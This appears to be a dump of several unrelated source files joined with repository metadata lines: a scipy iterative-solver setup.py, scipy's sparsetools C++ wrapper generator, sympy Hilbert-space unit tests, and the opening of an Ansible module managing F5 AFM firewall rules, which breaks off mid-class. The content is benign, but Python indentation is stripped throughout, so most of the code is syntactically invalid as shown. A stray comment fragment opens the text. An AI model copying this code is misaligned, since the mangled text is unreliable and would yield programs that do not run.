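#       </rowset>
#     </result>
#
# where each row carries every attribute read above; api.parse_ts converts
# the date strings into timestamps.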
|
mit
|
apbard/scipy
|
scipy/sparse/linalg/isolve/setup.py
|
108
|
1408
|
#!/usr/bin/env python
from __future__ import division, print_function, absolute_import
from os.path import join
def configuration(parent_package='',top_path=None):
from numpy.distutils.system_info import get_info, NotFoundError
from numpy.distutils.misc_util import Configuration
from scipy._build_utils import get_g77_abi_wrappers
config = Configuration('isolve',parent_package,top_path)
lapack_opt = get_info('lapack_opt')
if not lapack_opt:
raise NotFoundError('no lapack/blas resources found')
# iterative methods
methods = ['BiCGREVCOM.f.src',
'BiCGSTABREVCOM.f.src',
'CGREVCOM.f.src',
'CGSREVCOM.f.src',
# 'ChebyREVCOM.f.src',
'GMRESREVCOM.f.src',
# 'JacobiREVCOM.f.src',
'QMRREVCOM.f.src',
# 'SORREVCOM.f.src'
]
Util = ['STOPTEST2.f.src','getbreak.f.src']
sources = Util + methods + ['_iterative.pyf.src']
sources = [join('iterative', x) for x in sources]
sources += get_g77_abi_wrappers(lapack_opt)
config.add_extension('_iterative',
sources=sources,
extra_info=lapack_opt)
config.add_data_dir('tests')
return config
if __name__ == '__main__':
from numpy.distutils.core import setup
setup(**configuration(top_path='').todict())
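# Illustrative note (an assumption, not from the original file): this
# configuration is normally consumed by the parent scipy build, but the
# trailing setup() call also allows a standalone build from this directory,
# e.g.
#
#     python setup.py build
#
# provided a LAPACK/BLAS installation can be found.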
|
bsd-3-clause
|
ortylp/scipy
|
scipy/sparse/generate_sparsetools.py
|
67
|
12572
|
#!/usr/bin/env python
"""
Generate manual wrappers for C++ sparsetools code.
Type codes used:
'i': integer scalar
'I': integer array
'T': data array
'B': boolean array
'V': std::vector<integer>*
'W': std::vector<data>*
'*': indicates that the next argument is an output argument
'v': void
See sparsetools.cxx for more details.
"""
import optparse
import os
from distutils.dep_util import newer
#
# List of all routines and their argument types.
#
# The first code indicates the return value, the rest the arguments.
#
# bsr.h
BSR_ROUTINES = """
bsr_diagonal v iiiiIIT*T
bsr_scale_rows v iiiiII*TT
bsr_scale_columns v iiiiII*TT
bsr_sort_indices v iiii*I*I*T
bsr_transpose v iiiiIIT*I*I*T
bsr_matmat_pass2 v iiiiiIITIIT*I*I*T
bsr_matvec v iiiiIITT*T
bsr_matvecs v iiiiiIITT*T
bsr_elmul_bsr v iiiiIITIIT*I*I*T
bsr_eldiv_bsr v iiiiIITIIT*I*I*T
bsr_plus_bsr v iiiiIITIIT*I*I*T
bsr_minus_bsr v iiiiIITIIT*I*I*T
bsr_maximum_bsr v iiiiIITIIT*I*I*T
bsr_minimum_bsr v iiiiIITIIT*I*I*T
bsr_ne_bsr v iiiiIITIIT*I*I*B
bsr_lt_bsr v iiiiIITIIT*I*I*B
bsr_gt_bsr v iiiiIITIIT*I*I*B
bsr_le_bsr v iiiiIITIIT*I*I*B
bsr_ge_bsr v iiiiIITIIT*I*I*B
"""
# csc.h
CSC_ROUTINES = """
csc_diagonal v iiIIT*T
csc_tocsr v iiIIT*I*I*T
csc_matmat_pass1 v iiIIII*I
csc_matmat_pass2 v iiIITIIT*I*I*T
csc_matvec v iiIITT*T
csc_matvecs v iiiIITT*T
csc_elmul_csc v iiIITIIT*I*I*T
csc_eldiv_csc v iiIITIIT*I*I*T
csc_plus_csc v iiIITIIT*I*I*T
csc_minus_csc v iiIITIIT*I*I*T
csc_maximum_csc v iiIITIIT*I*I*T
csc_minimum_csc v iiIITIIT*I*I*T
csc_ne_csc v iiIITIIT*I*I*B
csc_lt_csc v iiIITIIT*I*I*B
csc_gt_csc v iiIITIIT*I*I*B
csc_le_csc v iiIITIIT*I*I*B
csc_ge_csc v iiIITIIT*I*I*B
"""
# csr.h
CSR_ROUTINES = """
csr_matmat_pass1 v iiIIII*I
csr_matmat_pass2 v iiIITIIT*I*I*T
csr_diagonal v iiIIT*T
csr_tocsc v iiIIT*I*I*T
csr_tobsr v iiiiIIT*I*I*T
csr_matvec v iiIITT*T
csr_matvecs v iiiIITT*T
csr_elmul_csr v iiIITIIT*I*I*T
csr_eldiv_csr v iiIITIIT*I*I*T
csr_plus_csr v iiIITIIT*I*I*T
csr_minus_csr v iiIITIIT*I*I*T
csr_maximum_csr v iiIITIIT*I*I*T
csr_minimum_csr v iiIITIIT*I*I*T
csr_ne_csr v iiIITIIT*I*I*B
csr_lt_csr v iiIITIIT*I*I*B
csr_gt_csr v iiIITIIT*I*I*B
csr_le_csr v iiIITIIT*I*I*B
csr_ge_csr v iiIITIIT*I*I*B
csr_scale_rows v iiII*TT
csr_scale_columns v iiII*TT
csr_sort_indices v iI*I*T
csr_eliminate_zeros v ii*I*I*T
csr_sum_duplicates v ii*I*I*T
get_csr_submatrix v iiIITiiii*V*V*W
csr_sample_values v iiIITiII*T
csr_count_blocks i iiiiII
csr_sample_offsets i iiIIiII*I
expandptr v iI*I
test_throw_error i
csr_has_sorted_indices i iII
csr_has_canonical_format i iII
"""
# coo.h, dia.h, csgraph.h
OTHER_ROUTINES = """
coo_tocsr v iiiIIT*I*I*T
coo_tocsc v iiiIIT*I*I*T
coo_todense v iiiIIT*Ti
coo_matvec v iIITT*T
coo_count_diagonals i iII
dia_matvec v iiiiITT*T
cs_graph_components i iII*I
"""
# List of compilation units
COMPILATION_UNITS = [
('bsr', BSR_ROUTINES),
('csr', CSR_ROUTINES),
('csc', CSC_ROUTINES),
('other', OTHER_ROUTINES),
]
#
# List of the supported index typenums and the corresponding C++ types
#
I_TYPES = [
('NPY_INT32', 'npy_int32'),
('NPY_INT64', 'npy_int64'),
]
#
# List of the supported data typenums and the corresponding C++ types
#
T_TYPES = [
('NPY_BOOL', 'npy_bool_wrapper'),
('NPY_BYTE', 'npy_byte'),
('NPY_UBYTE', 'npy_ubyte'),
('NPY_SHORT', 'npy_short'),
('NPY_USHORT', 'npy_ushort'),
('NPY_INT', 'npy_int'),
('NPY_UINT', 'npy_uint'),
('NPY_LONG', 'npy_long'),
('NPY_ULONG', 'npy_ulong'),
('NPY_LONGLONG', 'npy_longlong'),
('NPY_ULONGLONG', 'npy_ulonglong'),
('NPY_FLOAT', 'npy_float'),
('NPY_DOUBLE', 'npy_double'),
('NPY_LONGDOUBLE', 'npy_longdouble'),
('NPY_CFLOAT', 'npy_cfloat_wrapper'),
('NPY_CDOUBLE', 'npy_cdouble_wrapper'),
('NPY_CLONGDOUBLE', 'npy_clongdouble_wrapper'),
]
#
# Code templates
#
THUNK_TEMPLATE = """
static Py_ssize_t %(name)s_thunk(int I_typenum, int T_typenum, void **a)
{
%(thunk_content)s
}
"""
METHOD_TEMPLATE = """
NPY_VISIBILITY_HIDDEN PyObject *
%(name)s_method(PyObject *self, PyObject *args)
{
return call_thunk('%(ret_spec)s', "%(arg_spec)s", %(name)s_thunk, args);
}
"""
GET_THUNK_CASE_TEMPLATE = """
static int get_thunk_case(int I_typenum, int T_typenum)
{
%(content)s;
return -1;
}
"""
#
# Code generation
#
def get_thunk_type_set():
"""
    Get lists containing the Cartesian product of data types, plus a getter routine.
Returns
-------
i_types : list [(j, I_typenum, None, I_type, None), ...]
Pairing of index type numbers and the corresponding C++ types,
        and a unique index `j`. This is for routines that are parameterized
only by I but not by T.
it_types : list [(j, I_typenum, T_typenum, I_type, T_type), ...]
Same as `i_types`, but for routines parameterized both by T and I.
getter_code : str
C++ code for a function that takes I_typenum, T_typenum and returns
the unique index corresponding to the lists, or -1 if no match was
found.
"""
it_types = []
i_types = []
j = 0
getter_code = " if (0) {}"
for I_typenum, I_type in I_TYPES:
piece = """
else if (I_typenum == %(I_typenum)s) {
if (T_typenum == -1) { return %(j)s; }"""
getter_code += piece % dict(I_typenum=I_typenum, j=j)
i_types.append((j, I_typenum, None, I_type, None))
j += 1
for T_typenum, T_type in T_TYPES:
piece = """
else if (T_typenum == %(T_typenum)s) { return %(j)s; }"""
getter_code += piece % dict(T_typenum=T_typenum, j=j)
it_types.append((j, I_typenum, T_typenum, I_type, T_type))
j += 1
getter_code += """
}"""
return i_types, it_types, GET_THUNK_CASE_TEMPLATE % dict(content=getter_code)
def parse_routine(name, args, types):
"""
Generate thunk and method code for a given routine.
Parameters
----------
name : str
Name of the C++ routine
args : str
Argument list specification (in format explained above)
types : list
        List of types to instantiate, as returned by `get_thunk_type_set`
"""
ret_spec = args[0]
arg_spec = args[1:]
def get_arglist(I_type, T_type):
"""
Generate argument list for calling the C++ function
"""
args = []
next_is_writeable = False
j = 0
for t in arg_spec:
const = '' if next_is_writeable else 'const '
next_is_writeable = False
if t == '*':
next_is_writeable = True
continue
elif t == 'i':
args.append("*(%s*)a[%d]" % (const + I_type, j))
elif t == 'I':
args.append("(%s*)a[%d]" % (const + I_type, j))
elif t == 'T':
args.append("(%s*)a[%d]" % (const + T_type, j))
elif t == 'B':
args.append("(npy_bool_wrapper*)a[%d]" % (j,))
elif t == 'V':
if const:
raise ValueError("'V' argument must be an output arg")
args.append("(std::vector<%s>*)a[%d]" % (I_type, j,))
elif t == 'W':
if const:
raise ValueError("'W' argument must be an output arg")
args.append("(std::vector<%s>*)a[%d]" % (T_type, j,))
else:
raise ValueError("Invalid spec character %r" % (t,))
j += 1
return ", ".join(args)
# Generate thunk code: a giant switch statement with different
# type combinations inside.
thunk_content = """int j = get_thunk_case(I_typenum, T_typenum);
switch (j) {"""
for j, I_typenum, T_typenum, I_type, T_type in types:
arglist = get_arglist(I_type, T_type)
if T_type is None:
dispatch = "%s" % (I_type,)
else:
dispatch = "%s,%s" % (I_type, T_type)
if 'B' in arg_spec:
dispatch += ",npy_bool_wrapper"
piece = """
case %(j)s:"""
if ret_spec == 'v':
piece += """
(void)%(name)s<%(dispatch)s>(%(arglist)s);
return 0;"""
else:
piece += """
return %(name)s<%(dispatch)s>(%(arglist)s);"""
thunk_content += piece % dict(j=j, I_type=I_type, T_type=T_type,
I_typenum=I_typenum, T_typenum=T_typenum,
arglist=arglist, name=name,
dispatch=dispatch)
thunk_content += """
default:
throw std::runtime_error("internal error: invalid argument typenums");
}"""
thunk_code = THUNK_TEMPLATE % dict(name=name,
thunk_content=thunk_content)
# Generate method code
method_code = METHOD_TEMPLATE % dict(name=name,
ret_spec=ret_spec,
arg_spec=arg_spec)
return thunk_code, method_code
def main():
p = optparse.OptionParser(usage=__doc__.strip())
p.add_option("--no-force", action="store_false",
dest="force", default=True)
options, args = p.parse_args()
names = []
i_types, it_types, getter_code = get_thunk_type_set()
# Generate *_impl.h for each compilation unit
for unit_name, routines in COMPILATION_UNITS:
thunks = []
methods = []
# Generate thunks and methods for all routines
for line in routines.splitlines():
line = line.strip()
if not line or line.startswith('#'):
continue
try:
name, args = line.split(None, 1)
except ValueError:
raise ValueError("Malformed line: %r" % (line,))
args = "".join(args.split())
if 't' in args or 'T' in args:
thunk, method = parse_routine(name, args, it_types)
else:
thunk, method = parse_routine(name, args, i_types)
if name in names:
raise ValueError("Duplicate routine %r" % (name,))
names.append(name)
thunks.append(thunk)
methods.append(method)
# Produce output
dst = os.path.join(os.path.dirname(__file__),
'sparsetools',
unit_name + '_impl.h')
if newer(__file__, dst) or options.force:
print("[generate_sparsetools] generating %r" % (dst,))
with open(dst, 'w') as f:
write_autogen_blurb(f)
f.write(getter_code)
for thunk in thunks:
f.write(thunk)
for method in methods:
f.write(method)
else:
print("[generate_sparsetools] %r already up-to-date" % (dst,))
# Generate code for method struct
method_defs = ""
for name in names:
method_defs += "NPY_VISIBILITY_HIDDEN PyObject *%s_method(PyObject *, PyObject *);\n" % (name,)
method_struct = """\nstatic struct PyMethodDef sparsetools_methods[] = {"""
for name in names:
method_struct += """
{"%(name)s", (PyCFunction)%(name)s_method, METH_VARARGS, NULL},""" % dict(name=name)
method_struct += """
{NULL, NULL, 0, NULL}
};"""
# Produce sparsetools_impl.h
dst = os.path.join(os.path.dirname(__file__),
'sparsetools',
'sparsetools_impl.h')
if newer(__file__, dst) or options.force:
print("[generate_sparsetools] generating %r" % (dst,))
with open(dst, 'w') as f:
write_autogen_blurb(f)
f.write(method_defs)
f.write(method_struct)
else:
print("[generate_sparsetools] %r already up-to-date" % (dst,))
def write_autogen_blurb(stream):
stream.write("""\
/* This file is autogenerated by generate_sparsetools.py
* Do not edit manually or check into VCS.
*/
""")
if __name__ == "__main__":
main()
|
bsd-3-clause
|
amitjamadagni/sympy
|
sympy/physics/quantum/tests/test_hilbert.py
|
125
|
2513
|
from sympy.physics.quantum.hilbert import (
HilbertSpace, ComplexSpace, L2, FockSpace, TensorProductHilbertSpace,
DirectSumHilbertSpace, TensorPowerHilbertSpace
)
from sympy import Interval, oo, Symbol, sstr, srepr
def test_hilbert_space():
hs = HilbertSpace()
assert isinstance(hs, HilbertSpace)
assert sstr(hs) == 'H'
assert srepr(hs) == 'HilbertSpace()'
def test_complex_space():
c1 = ComplexSpace(2)
assert isinstance(c1, ComplexSpace)
assert c1.dimension == 2
assert sstr(c1) == 'C(2)'
assert srepr(c1) == 'ComplexSpace(Integer(2))'
n = Symbol('n')
c2 = ComplexSpace(n)
assert isinstance(c2, ComplexSpace)
assert c2.dimension == n
assert sstr(c2) == 'C(n)'
assert srepr(c2) == "ComplexSpace(Symbol('n'))"
assert c2.subs(n, 2) == ComplexSpace(2)
def test_L2():
b1 = L2(Interval(-oo, 1))
assert isinstance(b1, L2)
assert b1.dimension == oo
assert b1.interval == Interval(-oo, 1)
x = Symbol('x', real=True)
y = Symbol('y', real=True)
b2 = L2(Interval(x, y))
assert b2.dimension == oo
assert b2.interval == Interval(x, y)
assert b2.subs(x, -1) == L2(Interval(-1, y))
def test_fock_space():
f1 = FockSpace()
f2 = FockSpace()
assert isinstance(f1, FockSpace)
assert f1.dimension == oo
assert f1 == f2
def test_tensor_product():
n = Symbol('n')
hs1 = ComplexSpace(2)
hs2 = ComplexSpace(n)
h = hs1*hs2
assert isinstance(h, TensorProductHilbertSpace)
assert h.dimension == 2*n
assert h.spaces == (hs1, hs2)
h = hs2*hs2
assert isinstance(h, TensorPowerHilbertSpace)
assert h.base == hs2
assert h.exp == 2
assert h.dimension == n**2
f = FockSpace()
h = hs1*hs2*f
assert h.dimension == oo
def test_tensor_power():
n = Symbol('n')
hs1 = ComplexSpace(2)
hs2 = ComplexSpace(n)
h = hs1**2
assert isinstance(h, TensorPowerHilbertSpace)
assert h.base == hs1
assert h.exp == 2
assert h.dimension == 4
h = hs2**3
assert isinstance(h, TensorPowerHilbertSpace)
assert h.base == hs2
assert h.exp == 3
assert h.dimension == n**3
def test_direct_sum():
n = Symbol('n')
hs1 = ComplexSpace(2)
hs2 = ComplexSpace(n)
h = hs1 + hs2
assert isinstance(h, DirectSumHilbertSpace)
assert h.dimension == 2 + n
assert h.spaces == (hs1, hs2)
f = FockSpace()
h = hs1 + f + hs2
assert h.dimension == oo
assert h.spaces == (hs1, f, hs2)
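# Illustrative sketch (not in the original tests): dimensions compose across
# constructions, e.g.
#
#     assert (ComplexSpace(2)**2 + ComplexSpace(Symbol('n'))).dimension == 4 + Symbol('n')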
|
bsd-3-clause
|
ujenmr/ansible
|
lib/ansible/modules/network/f5/bigip_firewall_rule.py
|
14
|
38983
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2018, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_firewall_rule
short_description: Manage AFM Firewall rules
description:
- Manages firewall rules in an AFM firewall policy. New rules will always be added to the
end of the policy. Rules can be re-ordered using the C(bigip_security_policy) module.
Rules can also be pre-ordered using the C(bigip_security_policy) module and then later
updated using the C(bigip_firewall_rule) module.
version_added: 2.7
options:
name:
description:
- Specifies the name of the rule.
required: True
parent_policy:
description:
- The policy which contains the rule to be managed.
- One of either C(parent_policy) or C(parent_rule_list) is required.
parent_rule_list:
description:
- The rule list which contains the rule to be managed.
- One of either C(parent_policy) or C(parent_rule_list) is required.
action:
description:
- Specifies the action for the firewall rule.
- When C(accept), allows packets with the specified source, destination,
and protocol to pass through the firewall. Packets that match the rule,
and are accepted, traverse the system as if the firewall is not present.
- When C(drop), drops packets with the specified source, destination, and
protocol. Dropping a packet is a silent action with no notification to
the source or destination systems. Dropping the packet causes the connection
to be retried until the retry threshold is reached.
- When C(reject), rejects packets with the specified source, destination,
and protocol. When a packet is rejected the firewall sends a destination
unreachable message to the sender.
- When C(accept-decisively), allows packets with the specified source,
destination, and protocol to pass through the firewall, and does not require
any further processing by any of the further firewalls. Packets that match
the rule, and are accepted, traverse the system as if the firewall is not
present. If the Rule List is applied to a virtual server, management IP,
or self IP firewall rule, then Accept Decisively is equivalent to Accept.
- When creating a new rule, if this parameter is not provided, the default is
C(reject).
choices:
- accept
- drop
- reject
- accept-decisively
status:
description:
- Indicates the activity state of the rule or rule list.
- When C(disabled), specifies that the rule or rule list does not apply at all.
- When C(enabled), specifies that the system applies the firewall rule or rule
list to the given context and addresses.
- When C(scheduled), specifies that the system applies the rule or rule list
according to the specified schedule.
- When creating a new rule, if this parameter is not provided, the default
is C(enabled).
choices:
- enabled
- disabled
- scheduled
schedule:
description:
- Specifies a schedule for the firewall rule.
- You configure schedules to define days and times when the firewall rule is
made active.
description:
description:
- The rule description.
irule:
description:
- Specifies an iRule that is applied to the rule.
- An iRule can be started when the firewall rule matches traffic.
protocol:
description:
- Specifies the protocol to which the rule applies.
- Protocols may be specified by either their name or numeric value.
- A special protocol value C(any) can be specified to match any protocol. The
numeric equivalent of this protocol is C(255).
source:
description:
- Specifies packet sources to which the rule applies.
- Leaving this field blank applies the rule to all addresses and all ports.
- You can specify the following source items. An IPv4 or IPv6 address, an IPv4
or IPv6 address range, geographic location, VLAN, address list, port,
        port range, or port list.
- You can specify a mix of different types of items for the source address.
suboptions:
address:
description:
- Specifies a specific IP address.
address_list:
description:
- Specifies an existing address list.
address_range:
description:
- Specifies an address range.
country:
description:
- Specifies a country code.
port:
description:
- Specifies a single numeric port.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
port_list:
description:
          - Specifies an existing port list.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
port_range:
description:
- Specifies a range of ports, which is two port values separated by
a hyphen. The port to the left of the hyphen should be less than the
port to the right.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
destination:
description:
- Specifies packet destinations to which the rule applies.
- Leaving this field blank applies the rule to all addresses and all ports.
- You can specify the following destination items. An IPv4 or IPv6 address,
an IPv4 or IPv6 address range, geographic location, VLAN, address list, port,
        port range, or port list.
      - You can specify a mix of different types of items for the destination address.
suboptions:
address:
description:
- Specifies a specific IP address.
address_list:
description:
- Specifies an existing address list.
address_range:
description:
- Specifies an address range.
country:
description:
- Specifies a country code.
port:
description:
- Specifies a single numeric port.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
port_list:
description:
          - Specifies an existing port list.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
port_range:
description:
- Specifies a range of ports, which is two port values separated by
a hyphen. The port to the left of the hyphen should be less than the
port to the right.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
logging:
description:
- Specifies whether logging is enabled or disabled for the firewall rule.
- When creating a new rule, if this parameter is not specified, the default
        is C(no).
type: bool
rule_list:
description:
- Specifies an existing rule list to use in the rule.
- This parameter is mutually exclusive with many of the other individual-rule
specific settings. This includes C(logging), C(action), C(source),
        C(destination), C(irule), and C(protocol).
icmp_message:
description:
- Specifies the Internet Control Message Protocol (ICMP) or ICMPv6 message
C(type) and C(code) that the rule uses.
- This parameter is only relevant when C(protocol) is either C(icmp)(1) or
C(icmpv6)(58).
suboptions:
type:
description:
- Specifies the type of ICMP message.
- You can specify control messages, such as Echo Reply (0) and Destination
Unreachable (3), or you can specify C(any) to indicate that the system
applies the rule for all ICMP messages.
- You can also specify an arbitrary ICMP message.
- The ICMP protocol contains definitions for the existing message type and
number pairs.
code:
description:
- Specifies the code returned in response to the specified ICMP message type.
- You can specify codes, each set appropriate to the associated type, such
as No Code (0) (associated with Echo Reply (0)) and Host Unreachable (1)
(associated with Destination Unreachable (3)), or you can specify C(any)
to indicate that the system applies the rule for all codes in response to
that specific ICMP message.
- You can also specify an arbitrary code.
- The ICMP protocol contains definitions for the existing message code and
number pairs.
partition:
description:
- Device partition to manage resources on.
default: Common
state:
description:
- When C(state) is C(present), ensures that the rule exists.
- When C(state) is C(absent), ensures that the rule is removed.
choices:
- present
- absent
default: present
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
'''
EXAMPLES = r'''
- name: Create a new rule in the foo firewall policy
bigip_firewall_rule:
name: foo
parent_policy: policy1
protocol: tcp
source:
- address: 1.2.3.4
- address: "::1"
- address_list: foo-list1
- address_range: 1.1.1.1-2.2.2.2
- vlan: vlan1
- country: US
- port: 22
- port_list: port-list1
- port_range: 80-443
destination:
- address: 1.2.3.4
- address: "::1"
- address_list: foo-list1
- address_range: 1.1.1.1-2.2.2.2
- country: US
- port: 22
- port_list: port-list1
- port_range: 80-443
irule: irule1
action: accept
logging: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Create an ICMP specific rule
bigip_firewall_rule:
name: foo
protocol: icmp
icmp_message:
type: 0
source:
- country: US
action: drop
logging: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Add a new rule that uses an existing rule list
bigip_firewall_rule:
name: foo
rule_list: rule-list1
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
param1:
description: The new param1 value of the resource.
returned: changed
type: bool
sample: true
param2:
description: The new param2 value of the resource.
returned: changed
type: str
sample: Foo is bar
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import exit_json
from library.module_utils.network.f5.common import fail_json
from library.module_utils.network.f5.common import transform_name
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import exit_json
from ansible.module_utils.network.f5.common import fail_json
from ansible.module_utils.network.f5.common import transform_name
class Parameters(AnsibleF5Parameters):
api_map = {
'ipProtocol': 'protocol',
'log': 'logging',
'icmp': 'icmp_message',
}
api_attributes = [
'irule',
'ipProtocol',
'log',
'schedule',
'status',
'destination',
'source',
'icmp',
'action',
'description',
]
returnables = [
'logging',
'protocol',
'irule',
'source',
'destination',
'action',
'status',
'schedule',
'description',
'icmp_message',
]
updatables = [
'logging',
'protocol',
'irule',
'source',
'destination',
'action',
'status',
'schedule',
'description',
'icmp_message',
]
protocol_map = {
'1': 'icmp',
'6': 'tcp',
'17': 'udp',
'58': 'icmpv6',
'255': 'any',
}
class ApiParameters(Parameters):
@property
def logging(self):
if self._values['logging'] is None:
return None
if self._values['logging'] == 'yes':
return True
return False
@property
def protocol(self):
if self._values['protocol'] is None:
return None
if self._values['protocol'] in self.protocol_map:
return self.protocol_map[self._values['protocol']]
return self._values['protocol']
@property
def source(self):
result = []
if self._values['source'] is None:
return None
v = self._values['source']
if 'addressLists' in v:
result += [('address_list', x) for x in v['addressLists']]
if 'vlans' in v:
result += [('vlan', x) for x in v['vlans']]
if 'geo' in v:
result += [('geo', x['name']) for x in v['geo']]
if 'addresses' in v:
result += [('address', x['name']) for x in v['addresses']]
if 'ports' in v:
result += [('port', str(x['name'])) for x in v['ports']]
if 'portLists' in v:
result += [('port_list', x) for x in v['portLists']]
if result:
return result
return None
@property
def destination(self):
result = []
if self._values['destination'] is None:
return None
v = self._values['destination']
if 'addressLists' in v:
result += [('address_list', x) for x in v['addressLists']]
if 'geo' in v:
result += [('geo', x['name']) for x in v['geo']]
if 'addresses' in v:
result += [('address', x['name']) for x in v['addresses']]
if 'ports' in v:
result += [('port', x['name']) for x in v['ports']]
if 'portLists' in v:
result += [('port_list', x) for x in v['portLists']]
if result:
return result
return None
@property
def icmp_message(self):
if self._values['icmp_message'] is None:
return None
result = [x['name'] for x in self._values['icmp_message']]
return result
class ModuleParameters(Parameters):
@property
def irule(self):
if self._values['irule'] is None:
return None
if self._values['irule'] == '':
return ''
return fq_name(self.partition, self._values['irule'])
@property
def description(self):
if self._values['description'] is None:
return None
if self._values['description'] == '':
return ''
return self._values['description']
@property
def schedule(self):
if self._values['schedule'] is None:
return None
if self._values['schedule'] == '':
return ''
return fq_name(self.partition, self._values['schedule'])
@property
def source(self):
result = []
if self._values['source'] is None:
return None
for x in self._values['source']:
if 'address' in x and x['address'] is not None:
result += [('address', x['address'])]
elif 'address_range' in x and x['address_range'] is not None:
result += [('address', x['address_range'])]
elif 'address_list' in x and x['address_list'] is not None:
result += [('address_list', x['address_list'])]
elif 'country' in x and x['country'] is not None:
result += [('geo', x['country'])]
elif 'vlan' in x and x['vlan'] is not None:
result += [('vlan', fq_name(self.partition, x['vlan']))]
elif 'port' in x and x['port'] is not None:
result += [('port', str(x['port']))]
elif 'port_range' in x and x['port_range'] is not None:
result += [('port', x['port_range'])]
elif 'port_list' in x and x['port_list'] is not None:
result += [('port_list', fq_name(self.partition, x['port_list']))]
if result:
return result
return None
@property
def destination(self):
result = []
if self._values['destination'] is None:
return None
for x in self._values['destination']:
if 'address' in x and x['address'] is not None:
result += [('address', x['address'])]
elif 'address_range' in x and x['address_range'] is not None:
result += [('address', x['address_range'])]
elif 'address_list' in x and x['address_list'] is not None:
result += [('address_list', x['address_list'])]
elif 'country' in x and x['country'] is not None:
result += [('geo', x['country'])]
elif 'port' in x and x['port'] is not None:
result += [('port', str(x['port']))]
elif 'port_range' in x and x['port_range'] is not None:
result += [('port', x['port_range'])]
elif 'port_list' in x and x['port_list'] is not None:
result += [('port_list', fq_name(self.partition, x['port_list']))]
if result:
return result
return None
@property
def icmp_message(self):
if self._values['icmp_message'] is None:
return None
result = []
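        # ICMP filters are normalized to strings: '255' means 'any' for either
        # field, a bare '255' matches any message, a bare type matches any code
        # for that type, and everything else becomes 'type:code'.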
for x in self._values['icmp_message']:
type = x.get('type', '255')
code = x.get('code', '255')
if type is None or type == 'any':
type = '255'
if code is None or code == 'any':
code = '255'
if type == '255' and code == '255':
result.append("255")
elif type == '255' and code != '255':
raise F5ModuleError(
"A type of 'any' (255) requires a code of 'any'."
)
elif code == '255':
result.append(type)
else:
result.append('{0}:{1}'.format(type, code))
result = list(set(result))
return result
class Changes(Parameters):
def to_return(self):
result = {}
try:
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
except Exception:
pass
return result
class UsableChanges(Changes):
@property
def logging(self):
if self._values['logging'] is None:
return None
if self._values['logging'] is True:
return "yes"
return "no"
@property
def source(self):
if self._values['source'] is None:
return None
result = dict(
addresses=[],
addressLists=[],
vlans=[],
geo=[],
ports=[],
portLists=[]
)
for x in self._values['source']:
if x[0] == 'address':
result['addresses'].append({'name': x[1]})
elif x[0] == 'address_list':
result['addressLists'].append(x[1])
elif x[0] == 'vlan':
result['vlans'].append(x[1])
elif x[0] == 'geo':
result['geo'].append({'name': x[1]})
elif x[0] == 'port':
result['ports'].append({'name': str(x[1])})
elif x[0] == 'port_list':
result['portLists'].append(x[1])
return result
@property
def destination(self):
if self._values['destination'] is None:
return None
result = dict(
addresses=[],
addressLists=[],
vlans=[],
geo=[],
ports=[],
portLists=[]
)
for x in self._values['destination']:
if x[0] == 'address':
result['addresses'].append({'name': x[1]})
elif x[0] == 'address_list':
result['addressLists'].append(x[1])
elif x[0] == 'geo':
result['geo'].append({'name': x[1]})
elif x[0] == 'port':
result['ports'].append({'name': str(x[1])})
elif x[0] == 'port_list':
result['portLists'].append(x[1])
return result
@property
def icmp_message(self):
if self._values['icmp_message'] is None:
return None
result = []
for x in self._values['icmp_message']:
result.append({'name': x})
return result
class ReportableChanges(Changes):
@property
def source(self):
if self._values['source'] is None:
return None
result = []
v = self._values['source']
if v['addressLists']:
result += [('address_list', x) for x in v['addressLists']]
if v['vlans']:
result += [('vlan', x) for x in v['vlans']]
if v['geo']:
result += [('geo', x['name']) for x in v['geo']]
if v['addresses']:
result += [('address', x['name']) for x in v['addresses']]
if v['ports']:
result += [('port', str(x)) for x in v['ports']]
if v['portLists']:
result += [('port_list', x['name']) for x in v['portLists']]
if result:
return dict(result)
return None
@property
def destination(self):
if self._values['destination'] is None:
return None
result = []
v = self._values['destination']
if v['addressLists']:
result += [('address_list', x) for x in v['addressLists']]
if v['geo']:
result += [('geo', x['name']) for x in v['geo']]
if v['addresses']:
result += [('address', x['name']) for x in v['addresses']]
if v['ports']:
result += [('port', str(x)) for x in v['ports']]
if v['portLists']:
result += [('port_list', x['name']) for x in v['portLists']]
if result:
return dict(result)
return None
class Difference(object):
def __init__(self, want, have=None):
self.want = want
self.have = have
def compare(self, param):
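        # Prefer a property on this class named after the parameter; fall back
        # to a plain want-vs-have comparison in __default.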
try:
result = getattr(self, param)
return result
except AttributeError:
return self.__default(param)
def __default(self, param):
attr1 = getattr(self.want, param)
try:
attr2 = getattr(self.have, param)
if attr1 != attr2:
return attr1
except AttributeError:
return attr1
@property
def irule(self):
